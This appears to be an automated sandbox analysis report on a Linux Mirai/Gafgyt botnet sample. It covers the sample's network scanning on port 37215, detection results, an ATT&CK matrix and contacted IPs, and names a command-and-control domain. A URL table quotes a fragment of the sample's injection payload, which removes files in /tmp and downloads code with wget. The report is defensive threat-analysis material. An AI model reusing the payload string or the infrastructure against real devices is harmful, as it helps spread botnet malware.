              Source: unknownNetwork traffic detected: HTTP traffic on port 46310 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35882 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39212 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51876 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54566 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44582 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58434 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49488 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43270 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34050 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46240 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55388 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42276 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58330 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43224 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49560 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37076 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56274 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40166 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34816 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45438 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52872 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40638 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37932 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51214 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54252 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60718 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51404 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44504 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36866 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42044 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45096 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35332 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57296 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38800 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48126 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38930 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38440 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58346 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60882 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49490 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54254 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34524 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56504 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36132 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45274 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38730 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38196 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54890 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33814 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55308 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39902 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35328 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53394 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51404 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42686 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42320 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53244 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37908 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56356 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42586 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56932 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40856 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49644 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54022 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33708 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56870 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42970 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37502 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47500 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44684 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60038 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54960 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45998 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33040 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44866 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58650 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59230 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53950 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45604 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32970 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44434 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36230 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43930 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43254 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42732 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59890 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53660 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43048 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60466 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39138 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35870 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36016 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39560 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39322 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39562 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39098 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60856 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56392 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51240 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34792 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51254 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44336 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58940 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33426 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42440 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45606 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53890 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49442 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56330 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60560 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46090 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32890 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44278 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39666 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49450 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42044 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37174 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49014 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56460 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39336 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51482 -> 37215
              Source: /tmp/s8y4CBbFHW.elf (PID: 5432)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5457)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5458)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5459)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5460)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 5487)Queries kernel information via 'uname': Jump to behavior
              Source: s8y4CBbFHW.elf, 5432.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5436.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5438.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5439.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5441.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
              Source: s8y4CBbFHW.elf, 5432.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5436.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5438.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5439.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmp, s8y4CBbFHW.elf, 5441.1.00007ffc84f80000.00007ffc84fa1000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/s8y4CBbFHW.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/s8y4CBbFHW.elf
              Source: s8y4CBbFHW.elf, 5432.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5436.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5438.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5439.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5441.1.000056227af0d000.000056227af70000.rw-.sdmpBinary or memory string: z"V5!/etc/qemu-binfmt/sh4
              Source: s8y4CBbFHW.elf, 5432.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5436.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5438.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5439.1.000056227af0d000.000056227af70000.rw-.sdmp, s8y4CBbFHW.elf, 5441.1.000056227af0d000.000056227af70000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: s8y4CBbFHW.elf, type: SAMPLE
              Source: Yara matchFile source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5438, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5439, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5441, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: s8y4CBbFHW.elf, type: SAMPLE
              Source: Yara matchFile source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5438, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5439, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: s8y4CBbFHW.elf PID: 5441, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Scripting
              Path Interception1
              Hidden Files and Directories
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System11
              Non-Standard Port
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1454605 Sample: s8y4CBbFHW.elf Startdate: 10/06/2024 Architecture: LINUX Score: 100 29 156.226.176.129, 30401, 37215 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 2->29 31 41.244.207.155, 30401, 37215 VIETTEL-CM-ASCM Cameroon 2->31 33 99 other IPs or domains 2->33 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 4 other signatures 2->41 8 s8y4CBbFHW.elf 2->8         started        10 xfce4-panel wrapper-2.0 2->10         started        12 xfce4-panel wrapper-2.0 2->12         started        14 6 other processes 2->14 signatures3 process4 process5 16 s8y4CBbFHW.elf 8->16         started        18 wrapper-2.0 xfpm-power-backlight-helper 10->18         started        process6 20 s8y4CBbFHW.elf 16->20         started        23 s8y4CBbFHW.elf 16->23         started        25 s8y4CBbFHW.elf 16->25         started        27 2 other processes 16->27 signatures7 43 Sample tries to kill multiple processes (SIGKILL) 20->43

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              s8y4CBbFHW.elf71%ReversingLabsLinux.Trojan.Mirai
              s8y4CBbFHW.elf100%AviraEXP/ELF.Gafgyt.T
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              woofwoof.cfd
              94.156.71.59
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+true
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/soap/encoding/s8y4CBbFHW.elffalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/soap/envelope/s8y4CBbFHW.elffalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                204.81.197.25
                unknownCanada
                17120NBDOE-ORGCAfalse
                197.138.184.40
                unknownKenya
                36914KENET-ASKEfalse
                41.76.98.158
                unknownSouth Africa
                37236Reflex-SolutionsZAfalse
                197.47.174.199
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                147.182.90.219
                unknownUnited States
                137904BVPL-AS-APBlackVeatchSEAPTELTDSGfalse
                31.240.223.228
                unknownGermany
                3320DTAGInternetserviceprovideroperationsDEfalse
                156.77.159.173
                unknownUnited States
                11286KEYBANKUSfalse
                106.74.56.90
                unknownChina
                133118UNICOM-CNChinaUnicomIPnetworkCNfalse
                93.98.219.78
                unknownSaudi Arabia
                34397CYBERIA-RUHCyberiaRiyadhAutonomousSystemSAfalse
                41.6.58.237
                unknownSouth Africa
                29975VODACOM-ZAfalse
                100.234.162.220
                unknownUnited States
                21928T-MOBILE-AS21928USfalse
                156.110.31.161
                unknownUnited States
                5078ONENET-AS-1USfalse
                41.57.244.24
                unknownGhana
                37103BUSYINTERNETGHfalse
                41.53.81.129
                unknownSouth Africa
                37168CELL-CZAtrue
                150.221.11.248
                unknownUnited States
                10952ECU-ASUSfalse
                219.24.143.221
                unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                24.121.27.53
                unknownUnited States
                19108SUDDENLINK-COMMUNICATIONSUSfalse
                197.5.211.179
                unknownTunisia
                5438ATI-TNfalse
                5.132.89.253
                unknownNetherlands
                50266TMOBILE-THUISNLfalse
                77.248.241.119
                unknownNetherlands
                6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                44.21.72.28
                unknownUnited States
                7377UCSDUSfalse
                201.234.17.140
                unknownArgentina
                3549LVLT-3549USfalse
                119.87.92.132
                unknownChina
                134420CHINATELECOM-CHONGQING-IDCChongqingTelecomCNfalse
                8.67.93.32
                unknownUnited States
                3356LEVEL3USfalse
                73.39.205.52
                unknownUnited States
                7922COMCAST-7922USfalse
                197.105.204.215
                unknownSouth Africa
                37168CELL-CZAfalse
                197.193.135.131
                unknownEgypt
                36992ETISALAT-MISREGfalse
                50.180.70.32
                unknownUnited States
                7922COMCAST-7922USfalse
                53.87.103.11
                unknownGermany
                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                197.123.251.41
                unknownEgypt
                36992ETISALAT-MISREGfalse
                182.61.47.81
                unknownChina
                38365BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                197.170.195.171
                unknownSouth Africa
                37168CELL-CZAfalse
                197.252.67.126
                unknownSudan
                15706SudatelSDfalse
                156.145.207.196
                unknownUnited States
                395139NYP-INTERNETUSfalse
                134.254.164.251
                unknownUnited States
                3562SNLL-NET-ASUSfalse
                24.69.23.239
                unknownCanada
                6327SHAWCAfalse
                204.127.150.87
                unknownUnited States
                4466EASYLINK2USfalse
                219.36.155.28
                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                156.83.79.188
                unknownNetherlands
                1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                156.66.57.242
                unknownUnited States
                29975VODACOM-ZAfalse
                119.195.65.11
                unknownKorea Republic of
                4766KIXS-AS-KRKoreaTelecomKRfalse
                134.166.25.46
                unknownUnited States
                668DNIC-AS-00668USfalse
                45.221.127.233
                unknownSouth Africa
                328543sun-asnSCfalse
                9.113.189.87
                unknownUnited States
                3356LEVEL3USfalse
                41.184.27.238
                unknownNigeria
                29091IPNXngNGfalse
                41.151.251.55
                unknownSouth Africa
                5713SAIX-NETZAtrue
                41.110.181.97
                unknownAlgeria
                36947ALGTEL-ASDZtrue
                57.193.136.91
                unknownBelgium
                2686ATGS-MMD-ASUSfalse
                156.201.148.50
                unknownEgypt
                8452TE-ASTE-ASEGtrue
                51.108.182.228
                unknownUnited Kingdom
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                197.110.163.93
                unknownSouth Africa
                37168CELL-CZAfalse
                197.123.213.154
                unknownEgypt
                36992ETISALAT-MISREGfalse
                41.157.54.35
                unknownSouth Africa
                37168CELL-CZAfalse
                197.29.244.234
                unknownTunisia
                37492ORANGE-TNfalse
                156.115.240.117
                unknownSwitzerland
                59630NN_INSURANCE_EURASIA_NV_ITH-ASNLfalse
                82.33.102.114
                unknownUnited Kingdom
                5089NTLGBfalse
                187.235.171.241
                unknownMexico
                8151UninetSAdeCVMXfalse
                133.84.95.117
                unknownJapan55904KOGAKUIN-ASKOGAKUINUniversityJPfalse
                50.216.7.159
                unknownUnited States
                7922COMCAST-7922USfalse
                41.236.7.25
                unknownEgypt
                8452TE-ASTE-ASEGtrue
                99.95.240.202
                unknownUnited States
                7018ATT-INTERNET4USfalse
                58.56.229.26
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                70.244.115.102
                unknownUnited States
                7018ATT-INTERNET4USfalse
                49.109.82.107
                unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                156.62.19.237
                unknownNew Zealand
                24398AUT-NZ-APAucklandUniversityofTechnologyNZfalse
                111.176.255.223
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                207.224.226.137
                unknownUnited States
                209CENTURYLINK-US-LEGACY-QWESTUSfalse
                132.10.73.79
                unknownUnited States
                385AFCONC-BLOCK1-ASUSfalse
                156.226.176.129
                unknownSeychelles
                136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                100.5.224.129
                unknownUnited States
                701UUNETUSfalse
                206.96.21.192
                unknownUnited States
                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                78.106.130.5
                unknownRussian Federation
                8402CORBINA-ASOJSCVimpelcomRUfalse
                39.154.202.115
                unknownChina
